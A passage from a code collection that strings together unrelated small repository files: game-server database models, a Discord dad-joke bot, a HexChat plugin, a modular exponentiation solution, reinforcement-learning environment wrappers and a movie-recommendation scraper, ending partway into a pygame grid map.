rooms = db.relationship('Room', backref='app_version', lazy='dynamic')
class Room(InternalAPIMixin, db.Model):
__tablename__ = 'rooms'
id = db.Column(db.Integer, primary_key=True)
server_id = db.Column(db.Integer, db.ForeignKey('servers.id'))
app_version_id = db.Column(db.Integer, db.ForeignKey('application_versions.id'))
players = db.relationship('Player', backref='room', lazy='dynamic')
settings = db.Column(JSONType, nullable=False, default={})
max_players_count = db.Column(db.Integer, nullable=False, default=0)
async def check_moderations(self):
# TODO: get moderations from moderation servce
if True:
raise UserBannedError
async def join(self, player):
players = await future_exec(self.players.all)
if len(players) >= self.max_players_count:
raise PlayersLimitPerRoomExceeded
await self.check_moderations()
player.room_id = self.id
await future_exec(self.players.append, player)
# TODO: make other players to know about new player
player_data1 = {}
for p in players:
await RemoteUser.send_message_by_user_id(
p.id, message=json.dumps(player_data1), content_type='application/json')
# TODO: send some info to the new player
player_data2 = {}
await RemoteUser.send_message_by_user_id(
player.user_id, message=json.dumps(player_data2), content_type='application/json')
class Player(InternalAPIMixin, db.Model):
__tablename__ = 'players'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=False)
room_id = db.Column(db.Integer, db.ForeignKey('rooms.id'))
payload = db.Column(JSONType, nullable=False, default={})
async def get_user(self) -> RemoteUser:
data = await self.internal_request('login', 'get_user', user_id=self.user_id)
return RemoteUser(**data)
class GeoLocationRegion(db.Model):
__tablename__ = 'geo_location_regions'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
locations = db.relationship('GeoLocation', backref='region', lazy='dynamic')
class GeoLocation(db.Model):
__tablename__ = 'geo_locations'
id = db.Column(db.Integer, primary_key=True)
point = db.Column(Geometry(geometry_type='POINT', srid=4326))
region_id = db.Column(db.Integer, db.ForeignKey('geo_location_regions.id'))
servers = db.relationship('Server', backref='geo_location', lazy='dynamic')
default = db.Column(db.Boolean, nullable=False, default=False)
@classmethod
def get_nearest(cls, lat, lon):
"""
Find the nearest point to the input coordinates.
Convert the input coordinates to a WKT point and query for nearest point.
"""
pt = WKTElement('POINT({0} {1})'.format(lon, lat), srid=4326)
return cls.query.order_by(cls.point.distance_box(pt)).first()
@staticmethod
def from_point_to_xy(pt):
"""Extract x and y coordinates from a point geometry."""
# noinspection PyUnresolvedReferences
point_json = json.loads(db.session.scalar(func.ST_AsGeoJSON(pt.point)))
return point_json['coordinates']
class Server(InternalAPIMixin, db.Model):
__tablename__ = 'servers'
STATUSES = [
('active', _('Active')),
('failed', _('Failed')),
('overload', _('Overload')),
]
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
location = db.Column(URLType, nullable=False, unique=True)
geo_location_id = db.Column(db.Integer, db.ForeignKey('geo_locations.id'))
last_heartbeat = db.Column(db.DateTime)
status = db.Column(ChoiceType(STATUSES))
last_failure_tb = db.Column(db.Text)
enabled = db.Column(db.Boolean, nullable=False, default=True)
rooms = db.relationship('Room', backref='server', lazy='dynamic')
system_load = db.Column(db.Float, nullable=False, default=0.0)
ram_usage = db.Column(db.Float, nullable=False, default=0.0)
@hybrid_property
def active(self):
return self.enabled and self.status == 'active'
@as_future
def heartbeat(self, report: Union[HeartbeatReport, RequestError]):
if isinstance(report, RequestError):
self.status = 'failed'
self.last_failure_tb = ''.join(traceback.format_tb(report.__traceback__))  # format_tb returns a list of strings
elif isinstance(report, HeartbeatReport):
self.last_heartbeat = timezone.now()
self.system_load = report.system_load
self.ram_usage = report.ram_usage
self.status = 'overload' if report.server_is_overload() else 'active'
else:
raise ValueError('`report` argument should be either an instance of '
'HeartbeatReport or RequestError class')
self.save()
class Deployment(db.Model):
__tablename__ = 'deployment'
id = db.Column(db.Integer, primary_key=True)
class Party(db.Model):
__tablename__ = 'parties'
id = db.Column(db.Integer, primary_key=True)
``` |
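A hypothetical query sketch for the geo helpers above (assumes an application context with a PostGIS-backed session; the coordinates are invented):
```python
# find the stored location nearest to Berlin and unpack its point
nearest = GeoLocation.get_nearest(lat=52.52, lon=13.40)
if nearest is not None:
    lon, lat = GeoLocation.from_point_to_xy(nearest)  # GeoJSON order: [lon, lat]
    print(nearest.region.name if nearest.region else "-", lon, lat)
```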
{
"source": "0x5c/dadbot2k",
"score": 3
} |
#### File: 0x5c/dadbot2k/main.py
```python
import json
import random
import re
from pathlib import Path
from typing import Optional
import discord
from discord.ext import commands
import data.keys as keys
import data.options as opt
intents = discord.Intents.none()
intents.guilds = True
intents.messages = True
bot = commands.Bot(
command_prefix=opt.command_prefix,
case_insensitive=True,
help_command=None,
allowed_mentions=discord.AllowedMentions().none(),
member_cache_flags=discord.MemberCacheFlags().none(),
intents=intents
)
class ChanceManager:
def __init__(self, path: Path):
self._path = path / "risk.json"
self._chance: dict[Optional[int], float] = {}
self.__load()
def __load(self):
chancefile = self._path
if not chancefile.exists():
with chancefile.open("w") as file:
json.dump({}, file)
self._chance = {}
return
with chancefile.open("r") as file:
self._chance = {int(k): v for k, v in json.load(file).items()}  # JSON keys load as strings; restore int guild ids
def __dump(self):
with self._path.open("w") as file:
json.dump(self._chance, file)
def get(self, guild: Optional[int]) -> float:
if not guild:
return opt.default_chance
return self._chance.get(guild, opt.default_chance)
def set(self, guild: int, value: float):
if not (0 <= value <= 1):
raise ValueError("Chance must be a value between 0 and 1")
self._chance[guild] = value
self.__dump()
joke_chance = ChanceManager(Path(opt.chance_dir))
joke_prefix = r"(?:i(?:['`´]| a)?|a)m "
@bot.command()
@commands.check_any(commands.has_permissions(administrator=True), commands.is_owner())
@commands.guild_only()
async def chance(ctx: commands.Context, risk: Optional[float]):
"""Sets or display the dadjoking risk."""
gid = ctx.guild.id
if risk is None:
await ctx.send(f"ℹ️ Current risk of dadjoking is `~{joke_chance.get(gid):.2%}`.")
return
try:
joke_chance.set(gid, risk)
await ctx.send(f"✅ Successfully set the new dadjoking risk to `~{risk:.2%}`.")
except ValueError as e:
await ctx.send(f"⚠️ **Error!** {e}.")
@bot.event
async def on_message(msg: discord.Message):
if msg.author.bot:
return
guild = msg.guild
nick, gid = (guild.me.nick, guild.id) if guild else (None, None)
if (m := re.match(joke_prefix, msg.content, flags=re.I)) and random.random() <= joke_chance.get(gid):
dadname = nick if nick else "Dad!"
victim_name = msg.content.removeprefix(m.group(0))
await msg.channel.send(f"Hi {victim_name}, I'm {dadname}")
if guild:
print(f"* Gottem! in {guild} [{guild.id}]")
else:
print(f"* Gottem in DMs??? {msg.channel} [{msg.channel.id}]")
await bot.process_commands(msg)
@bot.event
async def on_ready():
print(f"> We are {bot.user} {bot.user.id}")
try:
bot.run(keys.discord_token)
except discord.LoginFailure as ex:
# Miscellaneous authentications errors: borked token and co
raise SystemExit("Error: Failed to authenticate: {}".format(ex))
except discord.ConnectionClosed as ex:
# When the connection to the gateway (websocket) is closed
raise SystemExit("Error: Discord gateway connection closed: [Code {}] {}".format(ex.code, ex.reason))
except ConnectionResetError as ex:
# More generic connection reset error
raise SystemExit("ConnectionResetError: {}".format(ex))
# --- Exit ---
# Codes for the wrapper shell script:
# 0 - Clean exit, don't restart
# 1 - Error exit, [restarting is up to the shell script]
# 42 - Clean exit, do restart
raise SystemExit(0)
``` |
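A standalone illustration of what the joke_prefix pattern above actually matches (the pattern is copied verbatim; the sample strings are ours):
```python
import re

joke_prefix = r"(?:i(?:['`´]| a)?|a)m "
for text in ("I'm hungry", "im hungry", "i am hungry", "am hungry", "ham sandwich"):
    m = re.match(joke_prefix, text, flags=re.I)
    print(text, "->", m.group(0) if m else "no dadjoke")
```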
{
"source": "0x5c/hexchat-void-repos",
"score": 2
} |
#### File: 0x5c/hexchat-void-repos/void_repos.py
```python
import hexchat
__module_name__ = "void-repos"
__module_version__ = "1.0.0"
__module_description__ = "Plugin for Voidlinux's git repositories"
debug = False
def handle_robot(word: list[str], word_eol: list[str], userdata):
if hexchat.get_info("server").endswith(".libera.chat"):
if hexchat.get_info("channel") == "#xbps":
if word[0] == "void-robot":
event, title, url = parse_robot(word[2])
hexchat.prnt(f"\00311Void\00310Robot\t\x0f{event}")
hexchat.prnt(f"\00310{title}")
if url:
hexchat.prnt(f"\00314{url}")
return hexchat.EAT_HEXCHAT
return hexchat.EAT_NONE
if debug:
def robot_test(word: list[str], word_eol: list[str], userdata):
event, title, url = parse_robot(word_eol[1])
hexchat.prnt(f"\00311Void\00310Robot\t\x0f{event}")
hexchat.prnt(f"\00310{title}")
if url:
hexchat.prnt(f"\00314{url}")
return hexchat.EAT_ALL
hexchat.hook_command("robotest", robot_test)
hexchat.hook_print("Channel Notice", handle_robot, priority=hexchat.PRI_HIGH)
hexchat.prnt("\00311Void\00310Repos\tPlugin loaded!")
# Test strings
# PR:
# steinex opened #34796 [void-packages] (cozy: update to 1.1.3, adopt)
# Push:
# Hoshpak pushed to void-packages (linux4.19: update to 4.19.223.)
def parse_robot(msg: str) -> tuple[str, str, str]:
user, msg = msg.split(" ", 1)
if msg.startswith(("opened", "closed")):
action, msg = msg.split(" ", 1)
if action == "opened":
action = "\00303" + action
else:
action = "\00305" + action
number, msg = msg.split(" ", 1)
number = number.removeprefix("#")
repo, msg = msg.split(" ", 1)
repo = repo.removeprefix("[").removesuffix("]")
title = msg.removeprefix("(").removesuffix(")")
return (f"\00312{user} {action} \00313#{number} \00311in \00312{repo}",
title,
f"https://github.com/void-linux/{repo}/pull/{number}")
if msg.startswith("pushed"):
msg = msg.removeprefix("pushed to ")
repo, msg = msg.split(" ", 1)
title = msg.removeprefix("(").removesuffix(")")
return (f"\00312{user} \00307pushed \00311to \00312{repo}",
title, "")
``` |
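parse_robot can be exercised against the sample notices quoted in the comments above, assuming the function is lifted out of the plugin (the module imports hexchat, which only exists inside HexChat):
```python
event, title, url = parse_robot(
    "steinex opened #34796 [void-packages] (cozy: update to 1.1.3, adopt)")
print(title)  # cozy: update to 1.1.3, adopt
print(url)    # https://github.com/void-linux/void-packages/pull/34796

event, title, url = parse_robot(
    "Hoshpak pushed to void-packages (linux4.19: update to 4.19.223.)")
print(title)  # linux4.19: update to 4.19.223.
print(url)    # empty string: push notices carry no PR link
```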
{
"source": "0x5eba/CSES-solutions",
"score": 3
} |
#### File: Mathematics/Exponentiation2/s.py
```python
def totient(n): # n - unsigned int
result = 1
p = 2 # prime numbers - 'iterator'
while p**2 <= n:
if(n % p == 0): # * (p-1)
result *= (p-1)
n //= p
while(n % p == 0): # * p^(k-1)
result *= p
n //= p
p += 1
if n != 1:
result *= (n-1)
return result # in O(sqrt(n))
def modpow(p, z, b, c, m): # (p^z)^(b^c) mod m
cp = 0
while m % p == 0:
cp += 1
m //= p # m = m' now
t = totient(m)
exponent = ((pow(b, c, t)*z) % t + t - (cp % t)) % t
# exponent = z*(b^c)-cp mod t
return pow(p, cp) * pow(p, exponent, m)
def solve(a, b, c, m): # split and solve
result = 1
p = 2 # primes
while p**2 <= a:
z = 0
while a % p == 0: # calculate z
a //= p
z += 1
if z != 0:
result *= modpow(p, z, b, c, m)
result %= m
p += 1
if a != 1: # Possible last prime
result *= modpow(a, 1, b, c, m)
return result % m
N = int(input())
while(N > 0):
a, b, c = input().split(' ')
a = int(a)
b = int(b)
c = int(c)
print(solve(a, b, c, 1000000007))
N -= 1
``` |
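The reduction in modpow rests on the generalized Euler theorem: for any a and any exponent e >= log2(m), a^e = a^(e mod phi(m) + phi(m)) (mod m), even when gcd(a, m) > 1. A standalone brute-force check of that identity (our own verification, not part of the solution):
```python
def phi(n):
    # Euler's totient by trial division
    result, p = n, 2
    while p * p <= n:
        if n % p == 0:
            while n % p == 0:
                n //= p
            result -= result // p
        p += 1
    if n > 1:
        result -= result // n
    return result

for a in range(20):
    for m in range(2, 40):
        t = phi(m)
        e = 64  # comfortably >= log2(m) for every m tested
        assert pow(a, e, m) == pow(a, e % t + t, m)
print("generalized Euler reduction verified")
```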
{
"source": "0x5eba/Dueling-DQN-SuperMarioBros",
"score": 4
} |
#### File: agent/model/losses.py
```python
from keras import backend as K
def huber_loss(y, y_pred, delta: float=1.0):
"""
Return the Huber loss between tensors.
Reference:
https://en.wikipedia.org/wiki/Huber_loss
https://web.stanford.edu/class/cs20si/2017/lectures/slides_03.pdf
https://keras.io/backend/
Args:
y: ground truth y labels
y_pred: predicted y labels
delta: the separating constant between MSE and MAE
Returns:
a scalar loss between the ground truth and predicted labels
"""
# calculate the residuals
residual = K.abs(y_pred - y)
# determine the result of the logical comparison to delta
condition = K.less_equal(residual, delta)
# calculate the two possible returns (MSE and MAE)
then_this = 0.5 * K.square(residual)
else_this = delta * residual - 0.5 * K.square(delta)
# use the condition to determine the resulting tensor
return K.switch(condition, then_this, else_this)
```
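A pure-NumPy reference of the same piecewise definition, useful for eyeballing the MSE-to-MAE switch at delta (our own cross-check, independent of the Keras backend):
```python
import numpy as np

def huber_np(y, y_pred, delta=1.0):
    residual = np.abs(y_pred - y)
    return np.where(residual <= delta,
                    0.5 * residual ** 2,                  # quadratic inside delta
                    delta * residual - 0.5 * delta ** 2)  # linear outside delta

print(huber_np(np.zeros(3), np.array([0.5, 1.0, 3.0])))  # [0.125 0.5   2.5  ]
```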
#### File: Dueling-DQN-SuperMarioBros/environment/frame_stack_env.py
```python
from collections import deque
import numpy as np
import gym
class FrameStackEnv(gym.Wrapper):
"""An environment wrapper to stack observations into a tensor."""
def __init__(self, env, k):
""" Stack k last frames.
Returns lazy array, which is much more memory efficient.
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(shp[0], shp[1], shp[2] * k),
dtype=np.uint8
)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class LazyFrames(object):
"""A memory efficient buffer for frame tensors."""
def __init__(self, frames):
"""
This object ensures that common frames between the observations are
only stored once. It exists purely to optimize memory usage which can
be huge for DQN's 1M frames replay buffers. This object should only be
converted to numpy array before being passed to the model. You'd not
believe how complex the previous solution was.
"""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=2)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
```
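A minimal sketch of how LazyFrames behaves once materialized (assumes the class above is importable; the frame contents are synthetic):
```python
import numpy as np

frames = [np.full((84, 84, 3), i, dtype=np.uint8) for i in range(4)]
lazy = LazyFrames(frames)
obs = np.asarray(lazy)       # __array__ concatenates along the channel axis
print(obs.shape)             # (84, 84, 12)
print(obs[..., 2].max(), obs[..., 9].max())  # 0 3 -- frame order is preserved
```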
#### File: Dueling-DQN-SuperMarioBros/environment/reward.py
```python
import gym
import numpy as np
class RewardCache(gym.Wrapper):
"""A wrapper that caches episode rewards."""
def __init__(self, env) -> None:
"""
Initialize a reward caching environment.
Args:
env: the environment to wrap
"""
gym.Wrapper.__init__(self, env)
self._score = 0
self.env.unwrapped.episode_rewards = []
def step(self, action):
state, reward, done, info = self.env.step(action)
self._score += reward
if done:
self.env.unwrapped.episode_rewards.append(self._score)
self._score = 0
return state, reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
"""An environment that clips rewards in {-1, 0, 1}."""
def __init__(self, env):
"""Initialize a new reward clipping environment."""
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {-1, 0, +1} using its sign."""
return np.sign(reward)
``` |
{
"source": "0x5eba/RecommendationBot",
"score": 2
} |
#### File: 0x5eba/RecommendationBot/movies_cinema_imdb.py
```python
from bs4 import BeautifulSoup
import requests
import pandas as pd
import numpy as np
import csv
import tmdbsimple as tmdb
import time
import numpy as np
import datetime
import copy
from unidecode import unidecode
import calendar
from ast import literal_eval
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.metrics.pairwise import linear_kernel, cosine_similarity
from nltk.stem.snowball import SnowballStemmer
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.corpus import wordnet
from surprise import Reader, Dataset, SVD, evaluate
# import sys
# from importlib import reload
# reload(sys)
# sys.setdefaultencoding('utf8')
tmdb.API_KEY = 'API_KEY'
path_src = '../the-movies-dataset/'
path_dest = '../cinema-dataset/'
final_list_recent_movies = []
def get_tmdb_info(title, original_year):
search = tmdb.Search()
response = search.movie(query=str(title))
for res in search.results:
year = res['release_date'].split('-')[0]
if str(year) == str(original_year):
print(title)
m = tmdb.Movies(res['id'])
credits = m.credits()
keywords = m.keywords()
overview = ''.join([i if ord(i) < 128 else '~' for i in res['overview']])
cast = ''.join([i if ord(i) < 128 else '~' for i in str(credits['cast'][:5])])
crew = ''.join([i if ord(i) < 128 else '~' for i in str(credits['crew'][:5])])
title = ''.join([i if ord(i) < 128 else '~' for i in res['title']])
year = str(res['release_date']).split('-')[0]
res = m.info()
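# 'auseless' sorts first among the dict keys, so its 0 lands in the CSV's leading 'useless' column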
film = {'auseless':0, 'budget':res['budget'], 'genres':res['genres'], 'id': res['id'], 'imdb_id': res['imdb_id'],
'overview':overview, 'popularity':res['popularity'], 'poster_path':res['poster_path'], 'revenue':res['revenue'],
'runtime':res['runtime'],'title':title, 'vote_average':res['vote_average'],
'vote_count':res['vote_count'], 'year':year}
links_csv = pd.read_csv(path_dest + 'links.csv')
id_already_done = links_csv['tmdbId'].values
for i in id_already_done:
if int(str(res['id'])) == int(i):
print("already in links")
return title
last_row_links = links_csv.tail(1)
free_movieId = int(last_row_links['movieId'].values)+1
with open(path_dest + 'metadata.csv', 'a') as csvfile:
fieldnames = list(film.keys())
fieldnames.sort()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(film)
with open(path_dest + 'credits.csv', 'a') as csvfile:
fieldnames = ['useless', 'cast','crew','id']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({'useless':0, 'cast':cast, 'crew':crew, 'id':res['id']})
with open(path_dest + 'keywords.csv', 'a') as csvfile:
fieldnames = ['useless', 'id', 'keywords']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({'useless':0, 'id':res['id'], 'keywords':keywords['keywords']})
with open(path_dest + 'links.csv', 'a') as csvfile:
fieldnames = ['useless', 'movieId', 'imdbId', 'tmdbId']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({'useless':0, 'movieId':free_movieId, 'imdbId':str(res['imdb_id'])[2:], 'tmdbId':str(res['id'])+'.0'})
print("done")
time.sleep(1)
return title
global_md, global_links, global_credits, global_keywords, global_cosine_sim, global_inverse_indices, global_indices_map, global_indices_map_for_tmdb, global_smd = None, None, None, None, None, None, None, None, None
def get_global_md():
return global_md
def get_global_links():
return global_links
def get_global_credits():
return global_credits
def get_global_keywords():
return global_keywords
def get_global_cosine_sim():
return global_cosine_sim
def get_global_inverse_indices():
return global_inverse_indices
def get_global_indices_map():
return global_indices_map
def get_global_indices_map_for_tmdb():
return global_indices_map_for_tmdb
def get_global_smd():
return global_smd
def load_everything():
md = pd.read_csv(path_dest + 'metadata.csv')
links = pd.read_csv(path_dest + 'links.csv')
credits = pd.read_csv(path_dest + 'credits.csv')
keywords = pd.read_csv(path_dest + 'keywords.csv')
del md['useless']
del links['useless']
del credits['useless']
del keywords['useless']
md['genres'] = md['genres'].fillna('[]').apply(literal_eval).apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
md['popularity'] = md['popularity'].fillna('[]').apply(lambda x: [str(int(x))] if isinstance(x, float) or isinstance(x, int) else [])
links = links[links['tmdbId'].notnull()]['tmdbId'].astype('int')
md['id'] = md['id'].astype('int')
smd = md[md['id'].isin(links)]
keywords['id'] = keywords['id'].astype('int')
credits['id'] = credits['id'].astype('int')
md['id'] = md['id'].astype('int')
md = md.merge(credits, on='id')
md = md.merge(keywords, on='id')
smd = md[md['id'].isin(links)]
smd['cast'] = smd['cast'].apply(literal_eval)
smd['crew'] = smd['crew'].apply(literal_eval)
smd['keywords'] = smd['keywords'].apply(literal_eval)
def get_director(x):
for i in x:
if i['job'] == 'Director':
return i['name']
return np.nan
indices = pd.Series(smd.index, index=smd['title'])
smd['keywords'] = smd['keywords'].apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
smd['cast'] = smd['cast'].apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
smd['cast'] = smd['cast'].apply(lambda x: x[:3] if len(x) >=3 else x)
smd['cast'] = smd['cast'].apply(lambda x: [str.lower(i.replace(" ", "")) for i in x])
smd['director'] = smd['crew'].apply(get_director)
smd['director'] = smd['director'].astype('str').apply(lambda x: str.lower(x.replace(" ", "")))
smd['director'] = smd['director'].apply(lambda x: [x,x,x])
s = smd.apply(lambda x: pd.Series(x['keywords']),axis=1).stack().reset_index(level=1, drop=True)
s.name = 'keyword'
s = s.value_counts()
s = s[s > 1]
stemmer = SnowballStemmer('english')
stemmer.stem('dogs')
def filter_keywords(x):
words = []
for i in x:
if i in s:
words.append(i)
return words
smd['keywords'] = smd['keywords'].apply(filter_keywords)
smd['keywords'] = smd['keywords'].apply(lambda x: [stemmer.stem(i) for i in x])
smd['keywords'] = smd['keywords'].apply(lambda x: [str.lower(i.replace(" ", "")) for i in x])
smd['soup'] = smd['keywords'] + smd['cast'] + smd['director'] + smd['genres'] + smd['popularity'] # + smd['year']
smd['soup'] = smd['soup'].apply(lambda x: ' '.join(x))
count = CountVectorizer(analyzer='word', ngram_range=(1, 2), min_df=0, stop_words='english')
count_matrix = count.fit_transform(smd['soup'])
cosine_sim = cosine_similarity(count_matrix, count_matrix)
smd = smd.reset_index()
titles = smd['title']
indices = pd.Series(smd.index, index=smd['title'])
inverse_indices = pd.Series(smd['title'], index=smd.index)
def convert_int(x):
try:
return int(x)
except:
return np.nan
id_map = pd.read_csv(path_dest + 'links.csv')[['movieId', 'tmdbId']]
id_map['tmdbId'] = id_map['tmdbId'].apply(convert_int)
id_map.columns = ['movieId', 'id']
id_map = id_map.merge(smd[['title', 'id']], on='id').set_index('title')
indices_map = id_map.set_index('id')
indices_map_for_tmdb = id_map.set_index('movieId')
global global_md, global_links, global_credits, global_keywords, global_cosine_sim, global_inverse_indices, global_indices_map, global_indices_map_for_tmdb, global_smd
global_md = copy.deepcopy(md)
links = pd.read_csv(path_dest + 'links.csv')
global_links = copy.deepcopy(links)
global_credits = copy.deepcopy(credits)
global_keywords = copy.deepcopy(keywords)
global_cosine_sim = copy.deepcopy(cosine_sim)
global_inverse_indices = copy.deepcopy(inverse_indices)
global_indices_map = copy.deepcopy(indices_map)
global_indices_map_for_tmdb = copy.deepcopy(indices_map_for_tmdb)
global_smd = copy.deepcopy(smd)
def get_recent_movies():
while True:
global final_list_recent_movies
final_list_recent_movies = []
# if False:
# from shutil import copyfile
# copyfile(path_src + 'pop_new_metadata.csv', path_dest + 'metadata.csv')
# copyfile(path_src + 'pop_new_links.csv', path_dest + 'links.csv')
# copyfile(path_src + 'credits.csv', path_dest + 'credits.csv')
# copyfile(path_src + 'keywords.csv', path_dest + 'keywords.csv')
now = datetime.datetime.now()
year = now.year
month = now.month
if month - 2 < 1:
month = 12 + (month - 2)  # wrap into the previous year (e.g. January -> November)
year -= 1
else:
month -= 2
data_finish = str(now.year)+"-"+str(now.month).zfill(2)+"-30" # e.g. 2018-05-30
data_start = str(year)+"-"+str(month).zfill(2)+"-1"
url = "https://www.imdb.com/search/title?release_date=" + str(data_start) + "," + str(data_finish) + "&languages=en&sort=num_votes,desc&page="
for number_page in range(1, 4):
print("PAGE: " + str(number_page))
url_num = url + str(number_page)
req = requests.get(url_num)
data = req.text
data = ''.join([i if ord(i) < 128 else '~' for i in data])
soup = BeautifulSoup(data,"html.parser")
for movie in soup.findAll('div', {'class':'lister-item mode-advanced'}):
imdb_rate = float(movie.find('div', {'class':'inline-block ratings-imdb-rating'}).get('data-value'))
metascore = movie.find('div', {'class':'inline-block ratings-metascore'})
if not metascore:
continue
metascore = int(str(metascore.text[:3]))
if float(metascore/10) + imdb_rate < 12.0:
continue
a = movie.find('div', {'class':"lister-item-content"}).find('h3',{'class':"lister-item-header"}).find('a')
imdb_link = "https://www.imdb.com" + '/'.join(str(a.get('href')).split('/')[:-1])
italian_title = a.text
year = movie.find('div', {'class':"lister-item-content"}).find('h3',{'class':"lister-item-header"}).find('span', {'class':'lister-item-year text-muted unbold'}).text
year = str(year)[1:5]
req_info = requests.get(imdb_link + "/releaseinfo")
data_info = req_info.text
data_info = ''.join([i if ord(i) < 128 else '~' for i in data_info])
soup_info = BeautifulSoup(data_info,"html.parser")
names = soup_info.find('table', {'class':'subpage_data spEven2Col', 'id':'akas'})
if not names:
continue
original_name = str(italian_title)
names = names.text.split('\n\n')
name_found = False
for n in names:
if len(n.split('\n')) != 2:
continue
state, name = n.split('\n')
if state == "UK" or state == "USA":
name_found = True
original_name = name
break
if not name_found:
for n in names:
if len(n.split('\n')) != 2:
continue
state, name = n.split('\n')
if state == "(original title)":
original_name = name
break
if '~' in str(original_name):
continue
release_date_italy = soup_info.find('table', {'class':'subpage_data spFirst', 'id':'release_dates'})
release_date_found = None
for n in release_date_italy.text.split('\n\n'):
if len(n.split('\n')) != 2:
continue
state, release_date = n.split('\n')
if state == "Italy":
release_date_found = release_date
break
available = True
if release_date_found:
now = datetime.datetime.now()
release_date_found_days, release_date_found_month, release_date_found_year = release_date_found.split(' ')
if int(release_date_found_year) > int(now.year):
available = False
for month_idx in range(1, 13):
if str(calendar.month_name[month_idx]) == release_date_found_month:
if int(month_idx) > int(now.month):
available = False
break
if int(month_idx) == int(now.month) and int(release_date_found_days) > int(now.day):
available = False
break
md = pd.read_csv(path_dest + 'metadata.csv')
title_already_done = md['title'].values
if str(original_name) in title_already_done and original_name != None:
if available:
final_list_recent_movies.append([str(original_name), ""])
else:
ry, rm, ra = release_date_found.split(' ')
final_list_recent_movies.append([str(original_name), ' '.join([ry, rm[:3], ra])])
print(original_name + " already done")
continue
title_found = get_tmdb_info(original_name, year)
if title_found != None:
if available:
final_list_recent_movies.append([str(original_name), ""])
else:
ry, rm, ra = release_date_found.split(' ')
final_list_recent_movies.append([str(original_name), ' '.join([ry, rm[:3], ra])])
load_everything()
print("ready")
time.sleep(int(np.random.randint(172800)+300))
from threading import Thread
Thread(target=get_recent_movies).start()
def get_all_cinema_movies():
return final_list_recent_movies
def final_cinema_movies(userId):
global final_list_recent_movies
global global_cosine_sim, global_inverse_indices, global_indices_map, global_indices_map_for_tmdb, global_smd
ratings = pd.read_csv(path_src + 'pop_new_ratings.csv')
del ratings['useless']
from hybrid import get_svd
svd = get_svd()
print("cinema for " + str(userId))
def hybrid_recommendation(userId, title, svd):
idx = 0
for i, t in enumerate(global_inverse_indices.values):
if t == title:
idx = i
break
sim_scores = list(enumerate(global_cosine_sim[int(idx)]))
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
sim_scores = sim_scores[1:10]
movie_indices = [i[0] for i in sim_scores]
movies = global_smd.iloc[movie_indices][['title','id']]
def pred(x):
try:
return svd.predict(userId, global_indices_map.loc[x]['movieId']).est
except:
return 0
movies['recommended'] = movies['id'].apply(pred)
movies = movies.sort_values('recommended', ascending=False)
total_predict = 0
for i in movies['recommended'].values:
total_predict += float(i)
return total_predict
dict_rank_movies = {}
for m, available in final_list_recent_movies:
total_predict = hybrid_recommendation(userId, m, svd)
if available == "":
dict_rank_movies[str(m)] = total_predict
else:
dict_rank_movies[str(m) + " [" + str(available) + "]"] = total_predict
best_movie_sorted = sorted(dict_rank_movies.items(), key=lambda x: x[1], reverse=True)
element_to_take = []
count_not_exit_yet = 0
count_exit_yet = 0
for i, (title, predict) in enumerate(best_movie_sorted):
if count_exit_yet >= 2:
break
if ("2018]" in str(title) or "2019]" in str(title)) and count_not_exit_yet < 3:
count_not_exit_yet += 1
element_to_take.append((title, predict))
elif "2018]" not in str(title) and "2019]" not in str(title):
count_exit_yet += 1
element_to_take.append((title, predict))
try:
print(element_to_take)
except:
pass
return element_to_take
``` |
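The hybrid ranking inside final_cinema_movies reduces to: content similarity proposes neighbours, SVD predictions order them. A toy, self-contained distillation (the data and the svd_pred stand-in are invented):
```python
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity

soups = ["action hero explosion", "action hero sequel", "romance drama tears"]
titles = ["Movie A", "Movie B", "Movie C"]
sim = cosine_similarity(CountVectorizer().fit_transform(soups))
neighbours = np.argsort(sim[0])[::-1][1:]   # most similar to "Movie A", minus itself
svd_pred = {1: 4.2, 2: 2.1}                 # stand-in for svd.predict(userId, movieId).est
ranked = sorted(neighbours, key=lambda i: svd_pred.get(i, 0.0), reverse=True)
print([titles[i] for i in ranked])          # ['Movie B', 'Movie C']
```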
{
"source": "0x5eba/RL-Gridmap",
"score": 3
} |
#### File: RL-Gridmap/DRQN/gridmap.py
```python
import pygame
import time
import numpy as np
import scipy.misc
import copy
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
class gameOb():
def __init__(self, coordinates, reward, name, color):
self.x = coordinates[0]
self.y = coordinates[1]
self.reward = reward
self.name = name
self.color = color
class Map:
def __init__(self, rows):
self.original_row = rows
self.rows = rows
self.size_margin = 5
self.size_square = 30
self.window_size, self.screen = self.set_window()
self.actions = 8
self.objects = []
def set_window(self):
win_size = self.size_square * self.rows + (self.size_margin * (self.rows + 1))
screen = pygame.display.set_mode((win_size, win_size))
return win_size, screen
def reset(self):
